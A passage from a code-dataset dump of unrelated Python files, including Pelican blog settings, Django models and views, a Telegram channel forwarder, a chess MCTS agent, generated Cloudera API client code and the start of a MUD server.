(('GitHub', 'https://github.com/jihenghu'),\n ('YouTube', 'https://www.youtube.com/channel/UCPInVfFat-LA865PCIsgrcA?view_as=subscriber'),\n ('Instagram', 'https://www.instagram.com/jihenghu/'),\n ('Twitter', 'https://twitter.com/hjh18305'),\n ('FaceBook', 'https://www.facebook.com/profile.php?id=100010229477330'),)\n\n#SITE_DESCRIPTION = 'I built this static site just for daily record'\nGOOGLE_PLUS_PROFILE_URL = 'https://plus.google.com/u/0/105611375860140618313'\nTWITTER_USERNAME = 'hjh18305'\n\n\nLANDING_PAGE_ABOUT = {'title':'The leading page',\n 'details': 'My name is Jiheng Hu. I am [jihenghu](https://github.com/jihenghu/) at Github,you can reach me via hjh18305@gmail.com .
'\n '\\n I am a graduate student of University of Science & Technology of China, school of earth and space science.
'\n '\\n This is a static website built powered by Pelican'}\nPROJECTS = [{\n 'name': 'Build pelican blog',\n 'url': 'https://github.com/jihenghu/jihenghu.github.io',\n 'description': 'Build my own static blog'},\n {'name': 'MLSE retrieval',\n 'url': '#',\n 'description': 'Develop new algorithm to retrieval land surface emissivities'},\n\t{'name': 'Django Blog',\n 'url': 'https://github.com/jihenghu/django-blog',\n 'description': 'My Django project'},\n\t{'name': 'Book System',\n 'url': 'https://github.com/jihenghu/booksystem',\n 'description': 'Java Web Project built with Spring Boot+Mybatis'}\n\t]\n\n\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"49596344","text":"from django.contrib.postgres.fields import ArrayField, JSONField\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\n\nfrom geo.models import CensusGeography\nfrom indicators.helpers import clean_sql\n\n\nclass MiniMap(models.Model):\n LAYER_TYPES = (\n ('background', 'background'),\n ('fill', 'fill'),\n ('line', 'line'),\n ('symbol', 'symbol'),\n ('raster', 'raster'),\n ('circle', 'circle'),\n ('fill - extrusion', 'fill - extrusion'),\n ('heatmap', 'heatmap'),\n ('hillshade', 'hillshade')\n )\n\n name = models.CharField(max_length=100)\n layer_type = models.CharField(max_length=16, choices=LAYER_TYPES, default='line')\n carto_table = models.CharField(max_length=80)\n fields = ArrayField(models.CharField(max_length=80), blank=True)\n geom_field = models.CharField(max_length=40, default=\"the_geom\")\n paint = JSONField(null=True, blank=True)\n layout = JSONField(null=True, blank=True)\n indicator = models.ForeignKey('Indicator', related_name='minimaps', on_delete=models.CASCADE)\n filter = models.TextField(null=True, blank=True)\n\n @property\n def slug(self):\n return slugify(self.name)\n\n @property\n def unfiltered_sql(self):\n return f\"SELECT {self.fields.join(', ')} FROM {self.carto_table}\"\n\n def get_sql_for_region(self, region: CensusGeography) -> str:\n sql = f\"\"\"\n SELECT {', '.join(self.fields)} , {self.geom_field}, the_geom_webmercator\n FROM {self.carto_table}\n WHERE ST_Intersects({self.geom_field}, ({region.carto_geom_sql}))\n \"\"\"\n if self.filter:\n sql += f\"\"\" AND {self.filter}\"\"\"\n\n return clean_sql(sql)\n\n def __str__(self):\n return self.name\n","sub_path":"indicators/models/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391116558","text":"from django.shortcuts import render, redirect\n\nfrom .models import University, Department, Faculty\nfrom .forms import UniversityForm, DepartmentForm, FacultyForm, FeedbackForm\n\n# Create your views here.\ndef index(request):\n \"\"\"The home page for RMP BD\"\"\"\n return render(request, 'rmp_bd_app/index.html')\n\ndef universities(request):\n \"\"\"The univeristy page for RMP BD\"\"\"\n universities = University.objects.order_by('date_added')\n context = {'universities': universities}\n return render(request, 'rmp_bd_app/universities.html', context)\n\ndef university(request, university_id):\n \"\"\"Shows each individual university \"\"\"\n university = University.objects.get(id=university_id)\n departments = 
university.department_set.order_by('-date_added')\n context = {'university' : university, 'departments' : departments}\n return render(request, 'rmp_bd_app/departments.html', context)\n\ndef faculty(request, department_id):\n \"\"\"Shows faculty members for a department\"\"\"\n department = Department.objects.get(id=department_id)\n faculties = department.faculty_set.order_by('-date_added')\n context = {'department': department, 'faculties': faculties}\n return render(request, 'rmp_bd_app/faculties.html', context)\n\ndef faculty_details(request, faculty_id):\n \"\"\"Shows the students' feedback about a faculty\"\"\"\n faculty = Faculty.objects.get(id=faculty_id)\n feedback = faculty.feedback_set.order_by('-date_added')\n context = {'faculty': faculty, 'feedback': feedback}\n return render(request, 'rmp_bd_app/faculty_details.html', context)\n\ndef new_university(request):\n \"\"\"Add a new University\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = UniversityForm()\n else:\n # POST data submitted; process date_added\n form = UniversityForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_university.html', context)\n\ndef new_department(request):\n \"\"\"Add a new Department\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = DepartmentForm()\n else:\n # POST data submitted; process date_added\n form = DepartmentForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_department.html', context)\n\ndef new_faculty(request):\n \"\"\"Add a new Faculty\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = FacultyForm()\n else:\n # POST data submitted; process date_added\n form = FacultyForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_faculty.html', context)\n\n\ndef new_feedback(request):\n \"\"\"Add a new Faculty\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = FeedbackForm()\n else:\n # POST data submitted; process date_added\n form = FeedbackForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_feedback.html', context)\n\n \n","sub_path":"rmp_bd_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"437816150","text":"from __future__ import unicode_literals\n\nr'''\necho az bz ay aaz bbz ayy aaaz bbbz ayyy // xstr //\nfilter -i:gm:a* -i:rm:.*z$ -x:len<3 -x:len>=4\n\naaz\n'''\n\n\ndef filter_(*args):\n def gtor(eval_here, g):\n from pypeline.yobj.str import Y_str\n from lib.peek import Peek\n argx = _argx(args)\n include, exclude = argx.include, argx.exclude\n\n run = not argx.expr_only\n\n if run:\n g = Peek(g)\n g0 = g[0]\n include = tuple(g0.tinypp(e, lambda_prefix=r'') for e in include)\n exclude = tuple(g0.tinypp(e, lambda_prefix=r'') for e in exclude)\n\n include, exclude = _chain(False, 
include), _chain(True, exclude)\n if include.__len__() == 0:\n include = r'True'\n if exclude.__len__() == 0:\n exclude = r'False'\n include = r'lambda y: (%s)' % include\n exclude = r'lambda y: (%s)' % exclude\n\n if run:\n include, exclude = map(eval_here.exec_here, (include, exclude))\n for y in g:\n if include(y) and not exclude(y):\n yield y\n else:\n yield Y_str(include)\n yield Y_str(exclude)\n\n return gtor\n\n\ndef _argx(args):\n from argparse import ArgumentParser\n\n class Argx(ArgumentParser):\n def __init__(self):\n super(Argx, self).__init__()\n _clude = dict(action=r'append', default=[])\n self.add_argument(r'-i', r'--include', **_clude)\n self.add_argument(r'-x', r'--exclude', **_clude)\n self.add_argument(r'-e', r'--expr-only', action=r'store_true')\n\n return Argx().parse_args(args)\n\n\ndef _chain(start_op, exprs):\n def chain_impl(current_op):\n expr_yielded = False\n for y in exprs:\n if y[:1] == r'-':\n current_op = not current_op\n if expr_yielded:\n yield current_op\n expr_yielded = False\n else:\n if expr_yielded:\n yield current_op\n yield y\n expr_yielded = True\n\n g = chain_impl(start_op)\n g = list(g)\n if 0 < g.__len__() and isinstance(g[-1], bool):\n g[-1:] = ()\n g = iter(g)\n\n def j(g):\n while True:\n try:\n yield next(g)\n b = next(g)\n except StopIteration:\n break\n yield (r'and', r'or')[b]\n\n g = j(g)\n j = r' '.join(g)\n return j\n","sub_path":"xpypeline/filter/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"201136678","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#from gensim import corpora\r\n#from collections import defaultdict\r\nfrom pprint import pprint\r\n##def openfile(filename):\r\n## fh = open(filename, \"r+\")\r\n## str = fh.read()\r\n## fh.close()\r\n## return str\r\ndef writetofile(filename,data):\r\n fw = open(filename, 'w')\r\n #for word,cnt in data:\r\n # fw.write(word + '\\t' + str(cnt)+ '\\\r\n fw.close()\r\n#def main(filename, topwords):\r\n## content = master\r\n## for sentence1 in master:\r\n## for sentence2 in content:\r\n## print(sentence1)\r\n## #print(content)\r\nwith open('nlp_ticket_input.txt') as f:\r\n content = f.readlines()\r\ndocuments = [x.strip() for x in content]\r\nstoplist = set('for a of the and to in job'.split())\r\ntexts = [[word for word in document.lower().split() if word not in stoplist]\r\n for document in documents]\r\n#pprint(texts[1])\r\ntexts_copy = texts\r\n#Remove Duplicates\r\nz = []\r\n#z = [[each_line for each_line in texts_copy if len(set(line).intersection(each_line)) == len(line)]\r\n# for line in texts]\r\n#pprint(texts)\r\n \r\n\r\n#output = [[line2 for line2 in line1 if line2 not in output]\r\n# for line1 in z]\r\nfor line in texts:\r\n counter = 0\r\n for each_line in texts_copy:\r\n if len(set(line).intersection(each_line)) == len(line):\r\n# print(line)\r\n z.append(line)\r\n# print(len(z))\r\nunique_list = []\r\n#unique list\r\nfor i in range(0,len(z)):\r\n if z[i] not in unique_list:\r\n unique_list.append(z[i])\r\ncumulative_count = 0\r\ncounter = []\r\n#Duplicate Counter\r\nfor item in unique_list:\r\n count = 0\r\n for items in texts:\r\n if len(set(item).intersection(items)) == len(item):\r\n count = count + 1\r\n counter.append(count)\r\n cumulative_count = count + cumulative_count\r\nprint(cumulative_count)\r\nif cumulative_count == len(texts):\r\n print(\"Counts Matched\")\r\nelse:\r\n print(\"No Match\")\r\nfor i in 
range(0,len(unique_list)):\r\n pprint(unique_list[i])\r\n print(\"Count: \", counter[i])\r\n","sub_path":"ticketanalyser/nlp_main.py","file_name":"nlp_main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365893828","text":"class Solution(object):\n def reverseBits(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n s = list(bin(n).replace('0b',''))\n s.reverse()\n s.extend(['0']*(32 - len(s)))\n return int(''.join(s),2)","sub_path":"190.py","file_name":"190.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391147235","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/30 10:43\n# @Author : Yajun Yin\n# @Note :\n\n\"\"\"\n可以和decorator中的timer对比\n\"\"\"\n\nimport threading\nimport random\nimport time\n\nTIMER = None\nFAILURE_CNT = 0\nALARM_INTERVAL = 15\n\n\ndef check_timer():\n global TIMER, FAILURE_CNT\n msg = None\n if FAILURE_CNT:\n msg = \"mission failed\"\n if msg:\n print(\"alarm:\", msg, FAILURE_CNT)\n FAILURE_CNT = 0\n TIMER = threading.Timer(ALARM_INTERVAL, check_timer)\n TIMER.start()\n\n\ndef task():\n time.sleep(3)\n if not random_error():\n print(\"task done\")\n else:\n print('task failed')\n\n\ndef random_error():\n global FAILURE_CNT\n s = random.randint(0, 10)\n if s >= 8:\n FAILURE_CNT += 1\n return True\n return False\n\n\nif __name__ == '__main__':\n TIMER = threading.Timer(1, check_timer)\n TIMER.start()\n while True:\n task()","sub_path":"Details-In-Python/concurrent/multi-thread/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"574662519","text":"import pygame\nfrom parameters import *\nimport game_process as gp\n\nclass Button:\n def __init__(self, width, height, color):\n self.width = width\n self.height = height\n self.color = color\n\n def draw(self, screen, x, y, action, *args, text=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if x < mouse[0] < x + self.width and y < mouse[1] < y + self.height:\n if click[0] and action is not None:\n action(*args)\n\n pygame.draw.rect(screen, self.color, (x, y, self.width, self.height))\n\n if text is not None:\n gp.print_text(screen, text, x, y)\n","sub_path":"Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441124547","text":"# coding: utf-8\n\n\"\"\"\n Cloudera Manager API\n\n
Cloudera Manager API v33. Introduced in Cloudera Manager 6.3.0. Cloudera Product Documentation.
\n\n OpenAPI spec version: 6.3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass ApiNameservice(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'name': 'str',\n 'active': 'ApiRoleRef',\n 'active_failover_controller': 'ApiRoleRef',\n 'stand_by': 'ApiRoleRef',\n 'stand_by_failover_controller': 'ApiRoleRef',\n 'secondary': 'ApiRoleRef',\n 'mount_points': 'list[str]',\n 'health_summary': 'ApiHealthSummary',\n 'health_checks': 'list[ApiHealthCheck]'\n }\n\n attribute_map = {\n 'name': 'name',\n 'active': 'active',\n 'active_failover_controller': 'activeFailoverController',\n 'stand_by': 'standBy',\n 'stand_by_failover_controller': 'standByFailoverController',\n 'secondary': 'secondary',\n 'mount_points': 'mountPoints',\n 'health_summary': 'healthSummary',\n 'health_checks': 'healthChecks'\n }\n\n def __init__(self, name=None, active=None, active_failover_controller=None, stand_by=None, stand_by_failover_controller=None, secondary=None, mount_points=None, health_summary=None, health_checks=None):\n \"\"\"\n ApiNameservice - a model defined in Swagger\n \"\"\"\n\n self._name = None\n self._active = None\n self._active_failover_controller = None\n self._stand_by = None\n self._stand_by_failover_controller = None\n self._secondary = None\n self._mount_points = None\n self._health_summary = None\n self._health_checks = None\n\n if name is not None:\n self.name = name\n if active is not None:\n self.active = active\n if active_failover_controller is not None:\n self.active_failover_controller = active_failover_controller\n if stand_by is not None:\n self.stand_by = stand_by\n if stand_by_failover_controller is not None:\n self.stand_by_failover_controller = stand_by_failover_controller\n if secondary is not None:\n self.secondary = secondary\n if mount_points is not None:\n self.mount_points = mount_points\n if health_summary is not None:\n self.health_summary = health_summary\n if health_checks is not None:\n self.health_checks = health_checks\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this ApiNameservice.\n Name of the nameservice.\n\n :return: The name of this ApiNameservice.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this ApiNameservice.\n Name of the nameservice.\n\n :param name: The name of this ApiNameservice.\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def active(self):\n \"\"\"\n Gets the active of this ApiNameservice.\n Reference to the active NameNode.\n\n :return: The active of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"\n Sets the active of this ApiNameservice.\n Reference to the active NameNode.\n\n :param active: The active of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._active = active\n\n @property\n def active_failover_controller(self):\n \"\"\"\n Gets the active_failover_controller of this ApiNameservice.\n Reference to the active NameNode's failover controller, if configured.\n\n :return: The active_failover_controller of this ApiNameservice.\n :rtype: 
ApiRoleRef\n \"\"\"\n return self._active_failover_controller\n\n @active_failover_controller.setter\n def active_failover_controller(self, active_failover_controller):\n \"\"\"\n Sets the active_failover_controller of this ApiNameservice.\n Reference to the active NameNode's failover controller, if configured.\n\n :param active_failover_controller: The active_failover_controller of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._active_failover_controller = active_failover_controller\n\n @property\n def stand_by(self):\n \"\"\"\n Gets the stand_by of this ApiNameservice.\n Reference to the stand-by NameNode.\n\n :return: The stand_by of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._stand_by\n\n @stand_by.setter\n def stand_by(self, stand_by):\n \"\"\"\n Sets the stand_by of this ApiNameservice.\n Reference to the stand-by NameNode.\n\n :param stand_by: The stand_by of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._stand_by = stand_by\n\n @property\n def stand_by_failover_controller(self):\n \"\"\"\n Gets the stand_by_failover_controller of this ApiNameservice.\n Reference to the stand-by NameNode's failover controller, if configured.\n\n :return: The stand_by_failover_controller of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._stand_by_failover_controller\n\n @stand_by_failover_controller.setter\n def stand_by_failover_controller(self, stand_by_failover_controller):\n \"\"\"\n Sets the stand_by_failover_controller of this ApiNameservice.\n Reference to the stand-by NameNode's failover controller, if configured.\n\n :param stand_by_failover_controller: The stand_by_failover_controller of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._stand_by_failover_controller = stand_by_failover_controller\n\n @property\n def secondary(self):\n \"\"\"\n Gets the secondary of this ApiNameservice.\n Reference to the SecondaryNameNode.\n\n :return: The secondary of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._secondary\n\n @secondary.setter\n def secondary(self, secondary):\n \"\"\"\n Sets the secondary of this ApiNameservice.\n Reference to the SecondaryNameNode.\n\n :param secondary: The secondary of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._secondary = secondary\n\n @property\n def mount_points(self):\n \"\"\"\n Gets the mount_points of this ApiNameservice.\n Mount points assigned to this nameservice in a federation.\n\n :return: The mount_points of this ApiNameservice.\n :rtype: list[str]\n \"\"\"\n return self._mount_points\n\n @mount_points.setter\n def mount_points(self, mount_points):\n \"\"\"\n Sets the mount_points of this ApiNameservice.\n Mount points assigned to this nameservice in a federation.\n\n :param mount_points: The mount_points of this ApiNameservice.\n :type: list[str]\n \"\"\"\n\n self._mount_points = mount_points\n\n @property\n def health_summary(self):\n \"\"\"\n Gets the health_summary of this ApiNameservice.\n Requires \\\"full\\\" view. The high-level health status of this nameservice.\n\n :return: The health_summary of this ApiNameservice.\n :rtype: ApiHealthSummary\n \"\"\"\n return self._health_summary\n\n @health_summary.setter\n def health_summary(self, health_summary):\n \"\"\"\n Sets the health_summary of this ApiNameservice.\n Requires \\\"full\\\" view. 
The high-level health status of this nameservice.\n\n :param health_summary: The health_summary of this ApiNameservice.\n :type: ApiHealthSummary\n \"\"\"\n\n self._health_summary = health_summary\n\n @property\n def health_checks(self):\n \"\"\"\n Gets the health_checks of this ApiNameservice.\n Requires \\\"full\\\" view. List of health checks performed on the nameservice.\n\n :return: The health_checks of this ApiNameservice.\n :rtype: list[ApiHealthCheck]\n \"\"\"\n return self._health_checks\n\n @health_checks.setter\n def health_checks(self, health_checks):\n \"\"\"\n Sets the health_checks of this ApiNameservice.\n Requires \\\"full\\\" view. List of health checks performed on the nameservice.\n\n :param health_checks: The health_checks of this ApiNameservice.\n :type: list[ApiHealthCheck]\n \"\"\"\n\n self._health_checks = health_checks\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, ApiNameservice):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","sub_path":"venv/lib/python3.7/site-packages/cm_client/models/api_nameservice.py","file_name":"api_nameservice.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"10326837","text":"import flask\nfrom flask import request, jsonify\nfrom filelock import Timeout, FileLock\nimport time\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.debug = True\nimport threading\n\n@app.route('/', methods=['GET'])\ndef home():\n lock = threading.Lock()\n with lock:\n o = open(\"get_id.txt\", \"r\")\n print(o)\n line = o.readline()\n i = int(line)\n print(\"before=>\", i)\n i += 1\n o.close()\n\n file = open(\"get_id.txt\", \"w\")\n file.write(str(i))\n print(\"after=>\", i)\n file.close()\n return jsonify({\"given_id\": i})\n\n# A route to return all of the available entries in our catalog.\n@app.route('/reset', methods=['GET'])\ndef reset_all():\n lock = threading.Lock()\n with lock:\n i = 0\n file = open(\"get_id.txt\", \"w\")\n file.write(str(i))\n print(\"after=>\", i)\n file.close()\n return jsonify({\"given_id\": \"newly created \"})","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"88288788","text":"import math\n\nimport chess\n\nfrom deepChess.Agent import Agent\nfrom deepChess.ChessUtils import position_evaluation_simple\nfrom deepChess.MCTreeSearchUtils import MCTSNode\nfrom deepChess.RandomAgent import 
RandomBot\n\n\ndef uct_score(parent_rollouts, child_rollouts, win_pct, temperature):\n exploration = math.sqrt(math.log(parent_rollouts) / child_rollouts)\n return win_pct + temperature * exploration\n\n\nclass MCTSBot(Agent):\n def __init__(self, num_rounds, temperature):\n Agent.__init__(self)\n self.num_rounds = num_rounds\n self.temperature = temperature\n\n def select_move(self, game_state):\n root = MCTSNode(game_state)\n\n for i in range(self.num_rounds):\n node = root\n while (not node.can_add_child()) and (not node.is_terminal()):\n node = self.select_child(node)\n\n # Add a new child node into the tree.\n if node.can_add_child():\n node = node.add_random_child()\n\n # Simulate a random game from this node.\n winner = self.simulate_random_game(node.game_state.copy())\n\n # Propagate scores back up the tree.\n while node is not None:\n node.record_win(winner)\n node = node.parent\n\n scored_moves = [\n (child.winning_frac(game_state.next_player()), child.move, child.num_rollouts)\n for child in root.children\n ]\n scored_moves.sort(key=lambda x: x[0], reverse=True)\n for s, m, n in scored_moves[:10]:\n print('%s - %.3f (%d)' % (m, s, n))\n\n # Having performed as many MCTS rounds as we have time for, we\n # now pick a move.\n best_move = None\n best_pct = -1.0\n for child in root.children:\n child_pct = child.winning_frac(game_state.next_player())\n if child_pct > best_pct:\n best_pct = child_pct\n best_move = child.move\n print('Select move %s with win pct %.3f' % (best_move, best_pct))\n return best_move\n\n def select_child(self, node):\n \"\"\"Select a child according to the upper confidence bound for\n trees (UCT) metric.\n \"\"\"\n total_rollouts = sum(child.num_rollouts for child in node.children)\n log_rollouts = math.log(total_rollouts)\n\n best_score = -1\n best_child = None\n # Loop over each child.\n for child in node.children:\n # Calculate the UCT score.\n win_percentage = child.winning_frac(node.game_state.next_player())\n exploration_factor = math.sqrt(log_rollouts / child.num_rollouts)\n uct_score = win_percentage + self.temperature * exploration_factor\n # Check if this is the largest we've seen so far.\n if uct_score > best_score:\n best_score = uct_score\n best_child = child\n return best_child\n\n @staticmethod\n def simulate_random_game(game):\n bots = {\n chess.WHITE: RandomBot(),\n chess.BLACK: RandomBot(),\n }\n while not game.done:\n eval = position_evaluation_simple(game.observation())\n if eval < -10:\n # print(\"white to move?\", game.white_to_move, \" game state:\", game.observation(), \"advantage:\", eval)\n game._resign()\n else:\n bot_move = bots[game.white_to_move].select_move(game)\n game = game.step(bot_move)\n # print(game.winner)\n return game.winner\n","sub_path":"old_code/deepChess/MCTSAgent.py","file_name":"MCTSAgent.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37045660","text":"# content of test_expectation.py\nimport pytest\nimport unittest\n\n\n@pytest.mark.parametrize(\n \"data, expected_mean\",\n [\n ([1, 2, 3, 4, 5], 3),\n ([-1, -2, -3, -4, -5], -3)\n ],\n)\ndef test_calculate_mean(data, expected_mean):\n sum = 0\n for d in data:\n sum += int(d)\n mean = sum / len(data)\n assert expected_mean == mean\n","sub_path":"parameterized/test_pytest_parametrize.py","file_name":"test_pytest_parametrize.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
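The `uct_score` helper defined at module level in the MCTSAgent record above is never actually called by `MCTSBot` (the bot re-derives the same formula inline in `select_child`). As a minimal, self-contained sketch of what that formula computes — the rollout counts, win rates, and temperature below are illustrative values, not taken from the dataset:

```python
import math


def uct_score(parent_rollouts, child_rollouts, win_pct, temperature):
    # Exploitation (win_pct) plus a temperature-scaled exploration bonus
    # that shrinks as a child node accumulates rollouts.
    exploration = math.sqrt(math.log(parent_rollouts) / child_rollouts)
    return win_pct + temperature * exploration


# Illustrative check: a rarely visited child can outscore a child with a
# higher win rate, which is what drives MCTS toward under-explored moves.
rare = uct_score(parent_rollouts=100, child_rollouts=2, win_pct=0.40, temperature=1.4)
common = uct_score(parent_rollouts=100, child_rollouts=50, win_pct=0.55, temperature=1.4)
assert rare > common
```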
+{"seq_id":"615874117","text":"import time\nfrom pynput.mouse import Button, Controller as m_Controller\nfrom pynput.keyboard import Key, Controller as k_Controller\n\n\ndef move_mouse(x: int, y: int) -> None:\n mouse = m_Controller()\n for i in range(1000):\n _x, _y = mouse.position\n move_x = 0\n move_y = 0\n if _x != x:\n if _x > x:\n move_x = -1\n else:\n move_x = 1\n if _y != y:\n if _y > y:\n move_y = -1\n else:\n move_y = 1\n mouse.move(move_x, move_y)\n time.sleep(0.005)\n\n\ndef loot() -> None:\n mouse = m_Controller()\n keyboard = k_Controller()\n with keyboard.pressed(Key.shift):\n mouse.click(Button.right)\n\n\ndef jump() -> None:\n keyboard = k_Controller()\n keyboard.press(Key.space)\n keyboard.release(Key.space)\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"253474063","text":"import json\nimport os\n\nfrom telethon import TelegramClient, sync, events\nfrom telethon.tl.types import Channel\n\n# 1. Заходим на сайт https://my.telegram.org/apps\n# 2. Заполняем поля App title и Short name, нажимаем «Create application» и запоминаем две переменные: api_id и api_hash.\n\napi_id = os.environ['API_ID']\napi_hash = os.environ['API_HASH']\nsession = os.environ['SESSION']\ninputChannels = json.loads(os.environ['INPUT_CHANNELS'])\noutputChannels = json.loads(os.environ['OUTPUT_CHANNELS'])\n\nclient = TelegramClient(session, api_id, api_hash)\n\n@client.on(events.NewMessage(chats=inputChannels))\nasync def normal_handler(event):\n for channel in outputChannels:\n await client.send_message(channel, event.message)\n\nclient.start()\n\nchannels = []\nfor dialog in client.iter_dialogs():\n if isinstance(dialog.entity, Channel):\n channels.append(dialog.entity.title + ' - ' + str(dialog.entity.id))\n\nprint(channels)\n\nclient.run_until_disconnected()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"31865664","text":"import time\nimport sqlite3\nimport random\n\n# import the MUD server class\nfrom mudserver import MudServer\nfrom lib.bd import *\nfrom lib.game import *\n\nconn = sqlite3.connect('cendrelune.db')\n\n# structure defining the rooms in the game. Try adding more rooms to the game!\nrooms = {\n \"Tavern\": {\n \"description\": \"You're in a cozy tavern warmed by an open fire.\",\n \"exits\": {\"outside\": \"Outside\"},\n },\n \"Outside\": {\n \"description\": \"You're standing outside a tavern. It's raining.\",\n \"exits\": {\"inside\": \"Tavern\"},\n }\n}\n\ntexte = []\n\n# liste des joueurs connectés\nplayers = {}\n\n# start the server\nmud = MudServer()\n\n# main game loop. We loop forever (i.e. until the program is terminated)\nwhile True:\n\n # pause for 1/5 of a second on each loop, so that we don't constantly\n # use 100% CPU time\n time.sleep(0.2)\n\n # 'update' must be called in the loop to keep the game running and give\n # us up-to-date information\n mud.update()\n\n # test d'event par interval\n #if random.randint(0, 10) > 8:\n # for pid, pl in players.items():\n # if players[pid]['connexion'] == 1:\n # mud.send_message(pid, \"\\nIl pleut...\")\n\n # go through any newly connected players\n for id in mud.get_new_players():\n\n # add the new player to the dictionary, noting that they've not been\n # named yet.\n # The dictionary key is the player's id number. 
